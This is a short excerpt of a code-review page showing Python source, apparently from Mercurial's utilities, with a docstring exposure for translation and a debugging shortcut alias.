        items[bt[0]] = entry

    return items
3772
3769
# Expose the per-engine bundle docstrings so they are picked up for
# translation (i18n).
i18nfunctions = bundlecompressiontopics().values()
3774
3771
# convenient shortcut for interactive debugging sessions
dst = debugstacktrace
General Comments 0
You need to be logged in to leave comments. Login now